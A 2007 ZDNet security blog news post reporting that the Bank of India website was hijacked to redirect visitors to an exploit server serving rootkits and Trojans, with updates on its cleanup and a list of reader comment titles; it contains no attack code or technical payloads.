On CHOW: Should that woman be drinking?
BNET Business Network:
BNET
TechRepublic
ZDNet

August 30th, 2007

Bank of India site hijacked, launching exploits

Posted by Ryan Naraine @ 3:26 pm

Categories: Botnets, Browsers, Data theft, Digital rights management, Exploit code, Firefox, Hackers, Metasploit, Microsoft, Passwords, Patch Watch, Pen testing, Responsible disclosure, Rootkits, Spam and Phishing, Spyware and Adware, Viruses and Worms, Vulnerability research, Zero-day attacks

Tags: Bank, Trojan Horse, Malware, Server, Sunbelt Software, Attack, Bank Of India Web Site, Ryan Naraine

The Bank of India Web site has been hijacked by online criminals and is being used to serve up rootkits and backdoor Trojans on unpatched Windows machines.

Malware hunters at Sunbelt Software are warning that a snippet of code has been planted into the Bank of India Web site to redirect surfers to an exploit server.

Bank of India site hijacked, launching exploits

There is evidence that the Russian Business Network (RBN), a group known for aggressive malware attacks, is behind this latest high-profile site compromise.

[ SEE: Super Bowl stadium site hacked, seeded with exploits ]

The RBN has been closely linked to the virulent Storm Worm attacks, VML, phishing, child pornography, Torpig, Rustock, and many other criminal attacks to date.

The Bank of India redirect is sending Windows users to a server hosting an e-mail worm file, two rootkits, two Trojan downloaders and three backdoor Trojans.

“Fully patched systems are likely unaffected,” Sunbelt Software president Alex Eckelberry said.

A source tracking the attack tells me the IcePack exploit launcher is the back-end being used for this run of drive-by downloads.

[ UPDATE: 9:00 PM Eastern ] This video (.wmv) from Roger Thompson at Exploit Prevention Labs shows the kind of damage that’s done when an unpatched machine simply surfs to the Bank of India home page.

It’s been almost seven hours since the compromise was discovered but Bank of India is still serving up the malicious redirect code. Malware researchers are working behind the scenes to make contact with the authorities to get the site cleaned and patched.

[ UPDATE #2: August 31, 2007 @ 9:59 AM ] The Bank of India site is now disinfected. This note appears on the home page:

This site is under temporary maintenance and will be available after 19:30 IST

To get a thorough understanding of what was happening at Bank of India during the site compromise, read Dancho Danchev’s blow-by-blow of this attack, which used fast-flux networks to run multiple malware campaigns.

Ryan NaraineRyan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.


Email Ryan Naraine

For daily updates on Ryan's activities, follow him on Twitter.

Subscribe to Zero Day via Email alerts or RSS.

  • Talkback
  • Most Recent of 28 Talkback(s)
No they didn't
Really they didn't. you didn't, no-one did. I hope you're ashamed of yourself wink... (Read the rest)
Posted by: Average_Joe Posted on: 09/26/07 You are currently: a Guest | | Terms of Use
Is it patched/fixed yet?  zkiwi | 08/30/07
Ryan, why no information  No_Ax_to_Grind | 08/30/07
Mix of IIS and Apache on Linux  net-com | 08/30/07
nonsensee, it is IIS since 2004  shis-ka-bob | 09/06/07
Win2k3/IIS6  toadlife | 08/31/07
How was it comprimised?  bjbrock | 08/30/07
So others can copycat it?  HypnoToad72 | 08/30/07
You don't sack your brother-in-law's first cousin....  Heimdall222 | 08/31/07
This isn't citibank or stan-chart.  kraterz | 08/31/07
look, the bank hasn't even taken the servers down  Narr vi | 08/31/07
New business model  Chad_z | 08/31/07
You really should learn to read  wolf_z | 08/31/07
Missing 1 word is acceptable  NonZealot | 08/31/07
Jumping to wild conclusions...  jasonp@... | 08/31/07
Wow, nice rant!  NonZealot | 08/31/07
This is your wake up call.  msalzberg | 09/01/07
Why hasn't anyone taken BOI off the net?  wolf_z | 08/31/07
Systems Support Headquarters  Dilberter | 08/31/07
Bad BOI, Bad BOI  cwallen19803 | 08/31/07
No they didn't  Average_Joe | 09/26/07
BOI simply needs to call customer service....  Heimdall222 | 08/31/07
Here's a wild guess  Heimdall222 | 08/31/07
Here's a wild guess  Swackhammer1@... | 09/03/07
Call customer service "hello this is bob" pronounced "bobe" - NT  Protector | 08/31/07
Hello Bobe, this is an ugly American  shis-ka-bob | 09/06/07
SOMEBODY IN INDIA OWES MONEY  BALTHOR | 08/31/07
Software  lalvarado@... | 08/31/07
Re  qquidd@... | 09/04/07

What do you think?

SponsoredWhite Papers, Webcasts, and Downloads

advertisement

Recent Entries

advertisement

Archives

Favorite Links

ZDNet Blogs

White Papers, Webcasts, and Downloads

SmartPlanet

Click Here